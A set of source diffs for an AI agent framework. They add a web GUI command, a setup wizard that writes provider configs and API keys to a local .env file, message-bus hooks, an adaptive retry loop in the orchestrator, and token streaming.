def _print_help() -> None:
"""Print chat command help."""
rprint(Panel(
"[bold]Chat Commands[/bold]\n\n"
" [cyan]/help[/cyan] — Show this help\n"
" [cyan]/clear[/cyan] — Clear conversation (new session)\n"
" [cyan]/model <name>[/cyan] — Switch LLM model\n"
" [cyan]/quit[/cyan] — Exit chat\n\n"
"[bold]Tips[/bold]\n\n"
" • Multi-line input: end a line with [cyan]\\[/cyan] to continue\n"
" • Your conversation is stored in memory for the session",
border_style="dim",
))

View File

@ -26,6 +26,91 @@ app.command(name="usage")(usage)
from agentkit.cli.pair import pair # noqa: E402 from agentkit.cli.pair import pair # noqa: E402
app.command(name="pair")(pair) app.command(name="pair")(pair)
from agentkit.cli.chat import chat # noqa: E402
app.command(name="chat")(chat)
@app.command()
def gui(
host: str = typer.Option("0.0.0.0", "--host", help="Server bind host"),
port: int = typer.Option(8002, "--port", help="Server port"),
config: Optional[str] = typer.Option(None, "--config", help="Path to agentkit.yaml"),
no_open: bool = typer.Option(False, "--no-open", help="Do not open browser automatically"),
):
"""Start AgentKit with a web UI for chatting with your Agent"""
import os
import webbrowser
import uvicorn
from agentkit.server.config import ServerConfig, find_config_path
from agentkit.cli.onboarding import run_onboarding
# Load config
config_path = find_config_path(config)
if config_path is None:
rprint("[yellow]No agentkit.yaml found.[/yellow]")
from rich.prompt import Confirm
if Confirm.ask("Would you like to run the setup wizard?", default=True):
config_path = run_onboarding(config_arg=config)
if config_path is None:
rprint("[red]Setup cancelled. Using defaults.[/red]")
else:
rprint("[dim]Using default configuration (no LLM providers).[/dim]")
if config_path:
rprint(f"[green]Loading config from {config_path}[/green]")
server_config = ServerConfig.from_yaml(config_path)
from pathlib import Path
dotenv = Path(config_path).parent / ".env"
server_config.load_dotenv(str(dotenv))
server_config = ServerConfig.from_yaml(config_path)
os.environ["AGENTKIT_CONFIG_PATH"] = config_path
# Check if LLM API key is configured
if not server_config.has_llm_provider():
rprint("[yellow]No LLM API key configured.[/yellow]")
from rich.prompt import Confirm
if Confirm.ask("Would you like to run the setup wizard?", default=True):
config_path = run_onboarding(config_arg=config)
if config_path is None:
rprint("[red]Setup cancelled. GUI may not function correctly without API key.[/red]")
else:
server_config = ServerConfig.from_yaml(config_path)
server_config.load_dotenv(str(dotenv))
server_config = ServerConfig.from_yaml(config_path)
os.environ["AGENTKIT_CONFIG_PATH"] = config_path
else:
rprint("[dim]Continuing without LLM provider — chat will not work.[/dim]")
# Signal to create_app that we want GUI mode (must be set before lifespan runs)
os.environ["AGENTKIT_GUI_MODE"] = "1"
# Browser always opens localhost, server binds to configured host
browser_url = f"http://localhost:{port}"
rprint(f"[green]Starting AgentKit GUI — open {browser_url} in your browser[/green]")
if not no_open:
import threading
def _open_browser():
import time
time.sleep(2.0)
webbrowser.open(browser_url)
threading.Thread(target=_open_browser, daemon=True).start()
# Create app directly (not factory mode) so server_config with resolved API keys
# is passed through without relying on env var inheritance in multiprocessing.
from agentkit.server.app import create_app
app = create_app(server_config=server_config)
uvicorn.run(
app, # Direct app instance, not factory string
host=host,
port=port,
)
@app.command() @app.command()
def serve( def serve(
@ -41,10 +126,22 @@ def serve(
import uvicorn import uvicorn
from agentkit.server.config import ServerConfig, find_config_path from agentkit.server.config import ServerConfig, find_config_path
from agentkit.cli.onboarding import needs_onboarding, run_onboarding
# Load .env file if present # Load .env file if present
config_path = find_config_path(config) config_path = find_config_path(config)
# Onboarding check
if config_path is None:
rprint("[yellow]No agentkit.yaml found.[/yellow]")
from rich.prompt import Confirm
if Confirm.ask("Would you like to run the setup wizard?", default=True):
config_path = run_onboarding(config_arg=config)
if config_path is None:
rprint("[red]Setup cancelled. Using defaults.[/red]")
else:
rprint("[dim]Using default configuration (no LLM providers).[/dim]")
if config_path: if config_path:
rprint(f"[green]Loading config from {config_path}[/green]") rprint(f"[green]Loading config from {config_path}[/green]")
server_config = ServerConfig.from_yaml(config_path) server_config = ServerConfig.from_yaml(config_path)
@ -57,6 +154,21 @@ def serve(
# Re-load config after .env is loaded (env vars now available) # Re-load config after .env is loaded (env vars now available)
server_config = ServerConfig.from_yaml(config_path) server_config = ServerConfig.from_yaml(config_path)
# Check if LLM API key is configured
if not server_config.has_llm_provider():
rprint("[yellow]No LLM API key configured.[/yellow]")
from rich.prompt import Confirm
if Confirm.ask("Would you like to run the setup wizard?", default=True):
config_path = run_onboarding(config_arg=config)
if config_path is None:
rprint("[red]Setup cancelled. Server may not function correctly without API key.[/red]")
else:
server_config = ServerConfig.from_yaml(config_path)
server_config.load_dotenv(str(dotenv))
server_config = ServerConfig.from_yaml(config_path)
else:
rprint("[dim]Continuing without LLM provider — API calls will fail.[/dim]")
# CLI args override config file for task_store # CLI args override config file for task_store
if task_store_backend is not None: if task_store_backend is not None:
server_config.task_store["backend"] = task_store_backend server_config.task_store["backend"] = task_store_backend

View File

@ -0,0 +1,316 @@
"""Onboarding flow — interactive first-time configuration wizard.
When no agentkit.yaml exists, this wizard guides the user through:
1. Choosing an LLM provider
2. Entering API key
3. Selecting a default model
4. Generating agentkit.yaml + .env
"""
from __future__ import annotations
import os
from pathlib import Path
from typing import Any
import yaml
from rich.panel import Panel
from rich.prompt import Prompt, Confirm
from rich import print as rprint
from agentkit.server.config import find_config_path
# ── Provider presets ──────────────────────────────────────────────────
PROVIDER_PRESETS: dict[str, dict[str, Any]] = {
"deepseek": {
"name": "DeepSeek",
"env_key": "DEEPSEEK_API_KEY",
"base_url": "https://api.deepseek.com/v1",
"type": "openai",
"models": {
"deepseek-chat": {"alias": "default"},
"deepseek-reasoner": {"alias": "reasoning"},
},
"default_model": "deepseek-chat",
},
"openai": {
"name": "OpenAI",
"env_key": "OPENAI_API_KEY",
"base_url": "https://api.openai.com/v1",
"type": "openai",
"models": {
"gpt-4o": {"alias": "default"},
"gpt-4o-mini": {"alias": "fast"},
},
"default_model": "gpt-4o",
},
"bailian-coding": {
"name": "百炼 Coding Plan",
"env_key": "DASHSCOPE_API_KEY",
"base_url": "https://coding.dashscope.aliyuncs.com/v1",
"type": "openai",
"models": {
"qwen3.7-plus": {"alias": "default"},
"qwen3.6-plus": {},
"qwen3.5-plus": {},
"qwen3-max-2026-01-23": {},
"qwen3-coder-plus": {"alias": "coder"},
"qwen3-coder-next": {},
"kimi-k2.5": {},
"glm-5": {},
"glm-4.7": {},
"MiniMax-M2.5": {},
},
"default_model": "qwen3.7-plus",
},
"qwen": {
"name": "通义千问 (Qwen/DashScope)",
"env_key": "DASHSCOPE_API_KEY",
"base_url": "https://dashscope.aliyuncs.com/compatible-mode/v1",
"type": "openai",
"models": {
"qwen-plus": {"alias": "default"},
"qwen-turbo": {"alias": "fast"},
},
"default_model": "qwen-plus",
},
"doubao": {
"name": "豆包 (Doubao)",
"env_key": "DOUBAO_API_KEY",
"base_url": "https://ark.cn-beijing.volces.com/api/v3",
"type": "openai",
"models": {
"doubao-pro-32k": {"alias": "default"},
},
"default_model": "doubao-pro-32k",
},
"gemini": {
"name": "Google Gemini",
"env_key": "GEMINI_API_KEY",
"base_url": "https://generativelanguage.googleapis.com",
"type": "gemini",
"models": {
"gemini-2.0-flash": {"alias": "default"},
},
"default_model": "gemini-2.0-flash",
},
"anthropic": {
"name": "Anthropic Claude",
"env_key": "ANTHROPIC_API_KEY",
"base_url": "https://api.anthropic.com",
"type": "anthropic",
"models": {
"claude-sonnet-4-20250514": {"alias": "default"},
},
"default_model": "claude-sonnet-4-20250514",
},
}
def needs_onboarding(config_arg: str | None = None) -> bool:
"""Check if onboarding is needed (no config file found)."""
return find_config_path(config_arg) is None
def run_onboarding(
output_dir: str = ".",
config_arg: str | None = None,
) -> str | None:
"""Run the interactive onboarding wizard.
Returns:
Path to the generated config file, or None if cancelled.
"""
rprint(Panel(
"[bold]Welcome to AgentKit![/bold]\n\n"
"No configuration file found. Let's set up your first Agent.\n"
"This will create [cyan]agentkit.yaml[/cyan] and [cyan].env[/cyan] for you.",
title="AgentKit Setup",
border_style="bright_blue",
))
output_path = Path(output_dir).resolve()
output_path.mkdir(parents=True, exist_ok=True)
# ── Step 1: Choose LLM provider ──────────────────────────────
rprint("\n[bold]Step 1: Choose your LLM provider[/bold]")
provider_keys = list(PROVIDER_PRESETS.keys())
for i, key in enumerate(provider_keys, 1):
preset = PROVIDER_PRESETS[key]
rprint(f" [cyan]{i}[/cyan]. {preset['name']}")
choice = Prompt.ask(
"\nSelect a provider",
choices=[str(i) for i in range(1, len(provider_keys) + 1)],
default="1",
)
selected_key = provider_keys[int(choice) - 1]
preset = PROVIDER_PRESETS[selected_key]
rprint(f"\n[green]Selected: {preset['name']}[/green]")
# ── Step 2: Enter API key ─────────────────────────────────────
rprint(f"\n[bold]Step 2: Enter your API key[/bold]")
rprint(f"You can get one from the {preset['name']} dashboard.")
api_key = Prompt.ask(
f" {preset['env_key']}",
password=True,
)
if not api_key.strip():
rprint("[red]API key is required. Onboarding cancelled.[/red]")
return None
# ── Step 2b: Select default model ────────────────────────────
available_models = list(preset["models"].keys())
if len(available_models) > 1:
rprint(f"\n[bold]Step 2b: Select your default model[/bold]")
for i, model in enumerate(available_models, 1):
alias = preset["models"][model].get("alias", "")
alias_str = f" [dim]({alias})[/dim]" if alias else ""
recommended = " [green]← recommended[/green]" if model == preset.get("default_model") else ""
rprint(f" [cyan]{i}[/cyan]. {model}{alias_str}{recommended}")
model_choice = Prompt.ask(
"Select default model",
choices=[str(i) for i in range(1, len(available_models) + 1)],
default=str(available_models.index(preset.get("default_model", available_models[0])) + 1),
)
selected_model = available_models[int(model_choice) - 1]
# Rebuild models dict: selected model gets "default" alias
updated_models: dict[str, Any] = {}
for model, conf in preset["models"].items():
if model == selected_model:
updated_models[model] = {**conf, "alias": "default"}
else:
# Remove "default" alias from other models
updated_models[model] = {k: v for k, v in conf.items() if k != "alias" or v != "default"}
preset = {**preset, "models": updated_models}
rprint(f"[green]Selected: {selected_model}[/green]")
else:
selected_model = available_models[0]
# ── Step 3: Optional — add a second provider ─────────────────
env_vars: dict[str, str] = {preset["env_key"]: api_key.strip()}
providers_config: dict[str, Any] = {
selected_key: {
"api_key": f"${{{preset['env_key']}}}",
"base_url": preset["base_url"],
"type": preset["type"],
"models": preset["models"],
}
}
model_aliases: dict[str, str] = {alias: f"{selected_key}/{model}" for model, conf in preset["models"].items() if (alias := conf.get("alias"))}
if Confirm.ask("\nWould you like to add a second LLM provider (for fallback)?", default=False):
remaining = [k for k in provider_keys if k != selected_key]
for i, key in enumerate(remaining, 1):
rprint(f" [cyan]{i}[/cyan]. {PROVIDER_PRESETS[key]['name']}")
choice2 = Prompt.ask(
"Select second provider (or press Enter to skip)",
choices=[str(i) for i in range(1, len(remaining) + 1)] + [""],
default="",
)
if choice2:
key2 = remaining[int(choice2) - 1]
preset2 = PROVIDER_PRESETS[key2]
api_key2 = Prompt.ask(f" {preset2['env_key']}", password=True)
if api_key2.strip():
env_vars[preset2["env_key"]] = api_key2.strip()
providers_config[key2] = {
"api_key": f"${{{preset2['env_key']}}}",
"base_url": preset2["base_url"],
"type": preset2["type"],
"models": preset2["models"],
}
for model, conf in preset2["models"].items():
alias = conf.get("alias")
if alias and alias not in model_aliases:
model_aliases[alias] = f"{key2}/{model}"
# ── Step 4: Generate config files ─────────────────────────────
rprint("\n[bold]Step 3: Generating configuration...[/bold]")
config = {
"server": {
"host": "0.0.0.0",
"port": 8001,
"workers": 1,
"rate_limit": 60,
},
"llm": {
"providers": providers_config,
"model_aliases": model_aliases,
},
"session": {
"backend": "memory",
},
"bus": {
"backend": "memory",
},
"task_store": {
"backend": "memory",
},
"skills": {
"auto_discover": True,
"paths": ["./skills"],
},
"logging": {
"level": "INFO",
"format": "text",
},
}
# Write agentkit.yaml
config_path = output_path / "agentkit.yaml"
with open(config_path, "w", encoding="utf-8") as f:
yaml.dump(config, f, default_flow_style=False, allow_unicode=True, sort_keys=False)
rprint(f" [green]Created:[/green] {config_path}")
# Write .env
env_path = output_path / ".env"
env_lines = [f"{k}={v}" for k, v in env_vars.items()]
with open(env_path, "w", encoding="utf-8") as f:
f.write("# AgentKit Environment Variables\n")
f.write("# Generated by onboarding wizard\n\n")
f.write("\n".join(env_lines) + "\n")
rprint(f" [green]Created:[/green] {env_path}")
# ── Step 4: Agent personality (optional) ──────────────────────
rprint("\n[bold]Step 4: Customize your Agent (optional)[/bold]")
rprint(" Press Enter to use defaults, or type your preferences.")
agent_name = Prompt.ask(" Agent name", default="AgentKit")
personality = Prompt.ask(" Personality", default="专业、友好、注重细节")
speaking_style = Prompt.ask(" Speaking style", default="简洁清晰")
# Create SOUL.md
from agentkit.memory.profile import MemoryStore
memory_store = MemoryStore(base_dir=Path.home() / ".agentkit")
soul_content = f"""## 身份
我是{agent_name}一个专业的 AI 助手
## 性格
{personality}
## 说话方式
{speaking_style}
## 做事准则
- 准确回答用户问题
- 主动记住用户提到的偏好和信息
- 不确定时坦诚说明
"""
memory_store.get_file("soul").write(soul_content.strip())
rprint(f" [green]Created:[/green] ~/.agentkit/SOUL.md")
rprint(Panel(
"[bold green]Setup complete![/bold green]\n\n"
"You can now run:\n"
" [cyan]agentkit chat[/cyan] — Start chatting with your Agent\n"
" [cyan]agentkit serve[/cyan] — Start the API server",
border_style="green",
))
return str(config_path)

View File

@ -1,7 +1,7 @@
"""AgentPool - 运行时 Agent 实例池""" """AgentPool - 运行时 Agent 实例池"""
import logging import logging
from typing import TYPE_CHECKING from typing import TYPE_CHECKING, Any
from agentkit.core.config_driven import ConfigDrivenAgent from agentkit.core.config_driven import ConfigDrivenAgent
from agentkit.core.protocol import AgentStatus from agentkit.core.protocol import AgentStatus
@ -24,12 +24,14 @@ class AgentPool:
skill_registry: SkillRegistry, skill_registry: SkillRegistry,
tool_registry: ToolRegistry | None = None, tool_registry: ToolRegistry | None = None,
compressor: "CompressionStrategy | None" = None, compressor: "CompressionStrategy | None" = None,
message_bus: Any = None,
): ):
self._agents: dict[str, ConfigDrivenAgent] = {} self._agents: dict[str, ConfigDrivenAgent] = {}
self._llm_gateway = llm_gateway self._llm_gateway = llm_gateway
self._skill_registry = skill_registry self._skill_registry = skill_registry
self._tool_registry = tool_registry or ToolRegistry() self._tool_registry = tool_registry or ToolRegistry()
self._compressor = compressor self._compressor = compressor
self._message_bus = message_bus
async def create_agent(self, config) -> ConfigDrivenAgent: async def create_agent(self, config) -> ConfigDrivenAgent:
"""Create and start an Agent instance """Create and start an Agent instance
@ -53,6 +55,19 @@ class AgentPool:
await agent.start() await agent.start()
self._agents[config.name] = agent self._agents[config.name] = agent
logger.info(f"Agent '{config.name}' created and started in pool") logger.info(f"Agent '{config.name}' created and started in pool")
# Register agent to MessageBus if available
if self._message_bus is not None:
try:
async def _handle_bus_message(msg):
"""Handle incoming bus messages for this agent."""
logger.debug(f"Agent '{config.name}' received bus message: {msg.topic}")
await self._message_bus.subscribe(config.name, _handle_bus_message)
logger.info(f"Agent '{config.name}' registered to MessageBus")
except Exception as e:
logger.warning(f"Failed to register agent '{config.name}' to MessageBus: {e}")
return agent return agent
async def remove_agent(self, name: str) -> None: async def remove_agent(self, name: str) -> None:
@ -60,6 +75,15 @@ class AgentPool:
agent = self._agents.pop(name, None) agent = self._agents.pop(name, None)
if agent: if agent:
await agent.stop() await agent.stop()
# Unregister from MessageBus if available
if self._message_bus is not None:
try:
await self._message_bus.unsubscribe(name)
logger.info(f"Agent '{name}' unregistered from MessageBus")
except Exception as e:
logger.warning(f"Failed to unregister agent '{name}' from MessageBus: {e}")
logger.info(f"Agent '{name}' stopped and removed from pool") logger.info(f"Agent '{name}' stopped and removed from pool")
def get_agent(self, name: str) -> ConfigDrivenAgent | None: def get_agent(self, name: str) -> ConfigDrivenAgent | None:

View File

@ -76,6 +76,16 @@ class OrchestrationResult:
aggregated_result: dict[str, Any] aggregated_result: dict[str, Any]
status: TaskStatus status: TaskStatus
total_duration_ms: float total_duration_ms: float
metadata: dict[str, Any] = field(default_factory=dict)
@dataclass
class OrchestratorConfig:
"""Orchestrator 配置"""
adaptive: bool = False
max_iterations: int = 3
quality_threshold: float = 0.7
class Orchestrator: class Orchestrator:
@ -103,6 +113,8 @@ class Orchestrator:
goal_planner: GoalPlanner | None = None, goal_planner: GoalPlanner | None = None,
plan_executor: PlanExecutor | None = None, plan_executor: PlanExecutor | None = None,
plan_checker: PlanChecker | None = None, plan_checker: PlanChecker | None = None,
config: OrchestratorConfig | None = None,
message_bus: Any = None,
): ):
""" """
Args: Args:
@ -114,6 +126,8 @@ class Orchestrator:
goal_planner: GoalPlanner 实例用于结构化目标分解可选 goal_planner: GoalPlanner 实例用于结构化目标分解可选
plan_executor: PlanExecutor 实例用于执行 ExecutionPlan可选 plan_executor: PlanExecutor 实例用于执行 ExecutionPlan可选
plan_checker: PlanChecker 实例用于检查和复盘可选 plan_checker: PlanChecker 实例用于检查和复盘可选
config: Orchestrator 配置包含自适应参数
message_bus: MessageBus 实例用于 Agent 间通信
""" """
self._agent_pool = agent_pool self._agent_pool = agent_pool
self._workspace = workspace or SharedWorkspace() self._workspace = workspace or SharedWorkspace()
@ -123,6 +137,8 @@ class Orchestrator:
self._goal_planner = goal_planner self._goal_planner = goal_planner
self._plan_executor = plan_executor self._plan_executor = plan_executor
self._plan_checker = plan_checker self._plan_checker = plan_checker
self._config = config or OrchestratorConfig()
self._message_bus = message_bus
async def execute(self, task: TaskMessage) -> OrchestrationResult: async def execute(self, task: TaskMessage) -> OrchestrationResult:
"""执行编排任务 """执行编排任务
@ -383,14 +399,64 @@ class Orchestrator:
agent.execute(sub_task_msg), agent.execute(sub_task_msg),
timeout=self._subtask_timeout, timeout=self._subtask_timeout,
) )
return { output = {
"status": "completed", "status": "completed",
"output": result.output_data if hasattr(result, "output_data") else result, "output": result.output_data if hasattr(result, "output_data") else result,
} }
# Publish progress via MessageBus if available
if self._message_bus is not None:
try:
from agentkit.bus.message import AgentMessage
await self._message_bus.publish(AgentMessage(
sender=subtask.assigned_agent,
recipient="orchestrator",
topic="task.progress",
payload={
"task_id": subtask.task_id,
"status": "completed",
},
))
except Exception as e:
logger.warning(f"Failed to publish progress via MessageBus: {e}")
return output
except asyncio.TimeoutError: except asyncio.TimeoutError:
return {"status": "failed", "error": "Subtask timed out"} error_result = {"status": "failed", "error": "Subtask timed out"}
if self._message_bus is not None:
try:
from agentkit.bus.message import AgentMessage
await self._message_bus.publish(AgentMessage(
sender=subtask.assigned_agent,
recipient="orchestrator",
topic="task.progress",
payload={
"task_id": subtask.task_id,
"status": "failed",
"error": "Subtask timed out",
},
))
except Exception as e:
logger.warning(f"Failed to publish progress via MessageBus: {e}")
return error_result
except Exception as e: except Exception as e:
return {"status": "failed", "error": str(e)} error_result = {"status": "failed", "error": str(e)}
if self._message_bus is not None:
try:
from agentkit.bus.message import AgentMessage
await self._message_bus.publish(AgentMessage(
sender=subtask.assigned_agent,
recipient="orchestrator",
topic="task.progress",
payload={
"task_id": subtask.task_id,
"status": "failed",
"error": str(e),
},
))
except Exception as e:
logger.warning(f"Failed to publish progress via MessageBus: {e}")
return error_result
def _inject_dependency_results( def _inject_dependency_results(
self, self,
@ -497,3 +563,258 @@ class Orchestrator:
except Exception: except Exception:
pass pass
return None return None
async def execute_adaptive(
self, task: TaskMessage,
) -> OrchestrationResult:
"""自适应编排:执行→评估→再分解循环。
execute() 不同此方法在第一轮执行后评估子任务结果质量
如果评估不通过且未达 max_iterations则基于评估反馈重新分解
未达标的子任务保留已完成的子任务结果然后执行新分解的子任务
Args:
task: 原始任务消息
Returns:
OrchestrationResult: 编排结果metadata 中包含迭代历史
"""
import time as _time
start_time = _time.monotonic()
iteration_history: list[dict[str, Any]] = []
# First execution
result = await self.execute(task)
# If adaptive not enabled or already succeeded, return directly
if not self._config.adaptive or result.status == TaskStatus.COMPLETED:
# Check quality even on success
if self._config.adaptive and self._llm_gateway:
quality = await self._evaluate_quality(task, result)
if quality["score"] >= self._config.quality_threshold:
result.metadata["quality_score"] = quality["score"]
return result
return result
# Adaptive loop
current_result = result
for iteration in range(1, self._config.max_iterations + 1):
# Evaluate quality
quality = await self._evaluate_quality(task, current_result)
iteration_history.append({
"iteration": iteration,
"quality_score": quality["score"],
"feedback": quality.get("feedback", ""),
})
if quality["score"] >= self._config.quality_threshold:
logger.info(
f"Adaptive iteration {iteration}: quality "
f"{quality['score']:.2f} >= {self._config.quality_threshold}"
)
current_result.metadata["quality_score"] = quality["score"]
current_result.metadata["iterations"] = iteration_history
return current_result
logger.info(
f"Adaptive iteration {iteration}: quality "
f"{quality['score']:.2f} < {self._config.quality_threshold}, "
f"re-decomposing failed subtasks"
)
# Re-decompose failed subtasks
new_result = await self._reexecute_failed(
task, current_result, quality,
)
current_result = new_result
# Exhausted iterations
current_result.metadata["iterations"] = iteration_history
return current_result
async def _evaluate_quality(
self,
task: TaskMessage,
result: OrchestrationResult,
) -> dict[str, Any]:
"""评估子任务结果质量。
Returns:
Dict with "score" (0-1) and optional "feedback" string.
"""
# Rule-based evaluation when no LLM
if self._llm_gateway is None:
return self._rule_based_evaluate(result)
try:
return await self._llm_evaluate(task, result)
except Exception as e:
logger.warning(f"LLM evaluation failed, falling back to rule-based: {e}")
return self._rule_based_evaluate(result)
def _rule_based_evaluate(
self, result: OrchestrationResult,
) -> dict[str, Any]:
"""基于规则的质量评估:根据完成率打分。"""
total = len(result.subtask_results)
if total == 0:
return {"score": 0.0, "feedback": "No subtasks executed"}
completed = sum(
1 for r in result.subtask_results.values()
if r.get("status") == "completed"
)
score = completed / total
feedback = ""
if score < 1.0:
failed = [
tid for tid, r in result.subtask_results.items()
if r.get("status") != "completed"
]
feedback = f"Failed subtasks: {failed}"
return {"score": score, "feedback": feedback}
async def _llm_evaluate(
self,
task: TaskMessage,
result: OrchestrationResult,
) -> dict[str, Any]:
"""使用 LLM 评估子任务结果质量。"""
import json
subtask_summary = []
for tid, r in result.subtask_results.items():
subtask_summary.append({
"task_id": tid,
"status": r.get("status", "unknown"),
"output_preview": str(r.get("output", ""))[:200],
})
prompt = (
f"Evaluate the quality of the following orchestration result.\n\n"
f"Original task: {task.input_data}\n"
f"Subtask results:\n{json.dumps(subtask_summary, ensure_ascii=False)}\n\n"
f'Respond ONLY with JSON: {{"score": 0.0-1.0, "feedback": "..."}}\n'
f"Score 1.0 = perfect, 0.0 = completely failed."
)
response = await self._llm_gateway.chat(
messages=[{"role": "user", "content": prompt}],
model="default",
)
try:
text = response.content.strip()
if text.startswith("```"):
lines = text.split("\n")
text = "\n".join(lines[1:-1])
data = json.loads(text)
return {
"score": float(data.get("score", 0.0)),
"feedback": data.get("feedback", ""),
}
except (json.JSONDecodeError, ValueError) as e:
logger.warning(f"Failed to parse LLM evaluation: {e}")
return self._rule_based_evaluate(result)
async def _reexecute_failed(
self,
task: TaskMessage,
previous_result: OrchestrationResult,
quality: dict[str, Any],
) -> OrchestrationResult:
"""重新执行失败的子任务,保留已完成的结果。"""
import time as _time
start_time = _time.monotonic()
# Identify failed subtasks
failed_task_ids = [
tid for tid, r in previous_result.subtask_results.items()
if r.get("status") != "completed"
]
if not failed_task_ids:
return previous_result
# Create new subtasks for failed ones, incorporating feedback
new_subtasks = []
for tid in failed_task_ids:
old_result = previous_result.subtask_results[tid]
new_subtasks.append(SubTask(
task_id=f"retry-{tid}",
parent_task_id=task.task_id,
assigned_agent=task.agent_name,
task_type=task.task_type,
input_data={
**task.input_data,
"previous_error": old_result.get("error", ""),
"improvement_feedback": quality.get("feedback", ""),
},
))
# Build a mini-plan for the retry subtasks
plan = OrchestrationPlan(
plan_id=f"retry-{previous_result.plan_id}",
parent_task_id=task.task_id,
subtasks=new_subtasks,
parallel_groups=[[st.task_id for st in new_subtasks]],
)
# Execute retry subtasks
retry_results = await self._execute_plan(plan, task)
# Merge: keep completed results, replace failed with retry results
merged_results = {}
for tid, r in previous_result.subtask_results.items():
if r.get("status") == "completed":
merged_results[tid] = r
for tid, r in retry_results.items():
# Map retry task IDs back to original
original_tid = tid.replace("retry-", "", 1)
merged_results[original_tid] = r
# Re-aggregate
all_subtasks = []
for tid, r in merged_results.items():
all_subtasks.append(SubTask(
task_id=tid,
parent_task_id=task.task_id,
assigned_agent=task.agent_name,
task_type=task.task_type,
input_data=task.input_data,
status=SubTaskStatus.COMPLETED if r.get("status") == "completed" else SubTaskStatus.FAILED,
result=r.get("output"),
))
retry_plan = OrchestrationPlan(
plan_id=plan.plan_id,
parent_task_id=task.task_id,
subtasks=all_subtasks,
parallel_groups=[],
)
aggregated = await self._aggregate_results(retry_plan, merged_results, task)
failed_count = sum(
1 for r in merged_results.values() if r.get("status") != "completed"
)
if failed_count == len(merged_results):
status = TaskStatus.FAILED
elif failed_count > 0:
status = TaskStatus.COMPLETED
else:
status = TaskStatus.COMPLETED
duration_ms = (_time.monotonic() - start_time) * 1000
return OrchestrationResult(
plan_id=plan.plan_id,
parent_task_id=task.task_id,
subtask_results=merged_results,
aggregated_result=aggregated,
status=status,
total_duration_ms=duration_ms,
)

View File

@ -16,6 +16,7 @@ from typing import TYPE_CHECKING, Any
from agentkit.core.exceptions import TaskCancelledError, TaskTimeoutError from agentkit.core.exceptions import TaskCancelledError, TaskTimeoutError
from agentkit.core.protocol import CancellationToken from agentkit.core.protocol import CancellationToken
from agentkit.llm.gateway import LLMGateway from agentkit.llm.gateway import LLMGateway
from agentkit.llm.protocol import LLMResponse
from agentkit.tools.base import Tool from agentkit.tools.base import Tool
from agentkit.telemetry.tracing import get_tracer, start_span, _OTEL_AVAILABLE from agentkit.telemetry.tracing import get_tracer, start_span, _OTEL_AVAILABLE
from agentkit.telemetry.metrics import ( from agentkit.telemetry.metrics import (
@ -59,7 +60,7 @@ class ReActResult:
class ReActEvent: class ReActEvent:
"""ReAct 执行事件""" """ReAct 执行事件"""
event_type: str # "thinking", "tool_call", "tool_result", "final_answer", "error" event_type: str # "thinking", "token", "tool_call", "tool_result", "final_answer", "error"
step: int step: int
data: dict[str, Any] = field(default_factory=dict) data: dict[str, Any] = field(default_factory=dict)
timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat()) timestamp: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat())
@ -533,14 +534,42 @@ class ReActEngine:
data={"message": f"Step {step}: Calling LLM..."}, data={"message": f"Step {step}: Calling LLM..."},
) )
# Think: call LLM # Think: call LLM (with optional token streaming)
llm_start = time.monotonic() llm_start = time.monotonic()
response = await self._llm_gateway.chat(
# Use streaming for token-by-token output
stream_content = ""
stream_usage = None
stream_tool_calls: list[Any] = []
stream_model = model
async for chunk in self._llm_gateway.chat_stream(
messages=conversation, messages=conversation,
model=model, model=model,
agent_name=agent_name, agent_name=agent_name,
task_type=task_type, task_type=task_type,
tools=tool_schemas, tools=tool_schemas,
):
if chunk.content:
stream_content += chunk.content
yield ReActEvent(
event_type="token",
step=step,
data={"content": chunk.content},
)
if chunk.usage:
stream_usage = chunk.usage
if chunk.tool_calls:
stream_tool_calls = chunk.tool_calls
if chunk.model:
stream_model = chunk.model
# Build response-like object from stream
response = self._build_response_from_stream(
content=stream_content,
tool_calls=stream_tool_calls,
usage=stream_usage,
model=stream_model,
) )
llm_duration_ms = int((time.monotonic() - llm_start) * 1000) llm_duration_ms = int((time.monotonic() - llm_start) * 1000)
@ -776,6 +805,24 @@ class ReActEngine:
schemas.append(schema) schemas.append(schema)
return schemas return schemas
@staticmethod
def _build_response_from_stream(
content: str,
tool_calls: list[Any],
usage: Any,
model: str,
) -> LLMResponse:
"""Build an LLMResponse from accumulated stream chunks."""
from agentkit.llm.protocol import LLMResponse, TokenUsage
if usage is None:
usage = TokenUsage()
return LLMResponse(
content=content,
tool_calls=tool_calls,
usage=usage,
model=model,
)
def _find_tool(self, name: str, tools: list[Tool]) -> Tool | None: def _find_tool(self, name: str, tools: list[Tool]) -> Tool | None:
"""根据名称从可用工具中查找工具""" """根据名称从可用工具中查找工具"""
for tool in tools: for tool in tools:

View File

@ -93,6 +93,8 @@ class OpenAICompatibleProvider(LLMProvider):
payload["tools"] = request.tools payload["tools"] = request.tools
payload["tool_choice"] = request.tool_choice payload["tool_choice"] = request.tool_choice
logger.debug(f"Chat request to {url}: model={request.model}, messages={len(request.messages)}, tools={len(request.tools or [])}")
start = time.monotonic() start = time.monotonic()
try: try:
@ -108,6 +110,7 @@ class OpenAICompatibleProvider(LLMProvider):
error_msg = error_body.get("error", {}).get("message", "Request failed") error_msg = error_body.get("error", {}).get("message", "Request failed")
except Exception: except Exception:
error_msg = f"HTTP {resp.status_code}" error_msg = f"HTTP {resp.status_code}"
logger.error(f"Chat request failed: HTTP {resp.status_code}, error: {error_msg}")
# 不在错误消息中暴露完整响应体,防止 API Key 泄露 # 不在错误消息中暴露完整响应体,防止 API Key 泄露
raise LLMProviderError("openai", f"HTTP {resp.status_code}: {error_msg}") raise LLMProviderError("openai", f"HTTP {resp.status_code}: {error_msg}")
@ -177,19 +180,27 @@ class OpenAICompatibleProvider(LLMProvider):
"temperature": request.temperature, "temperature": request.temperature,
"max_tokens": request.max_tokens, "max_tokens": request.max_tokens,
"stream": True, "stream": True,
"stream_options": {"include_usage": True},
} }
if request.tools: if request.tools:
payload["tools"] = request.tools payload["tools"] = request.tools
payload["tool_choice"] = request.tool_choice payload["tool_choice"] = request.tool_choice
logger.debug(f"Stream request to {url}: model={request.model}, messages={len(request.messages)}, tools={len(request.tools or [])}")
response_ctx = self._client.stream("POST", url, json=payload, headers=headers) response_ctx = self._client.stream("POST", url, json=payload, headers=headers)
response = await response_ctx.__aenter__() response = await response_ctx.__aenter__()
if response.status_code != 200: if response.status_code != 200:
await response.aread() await response.aread()
await response_ctx.__aexit__(None, None, None) await response_ctx.__aexit__(None, None, None)
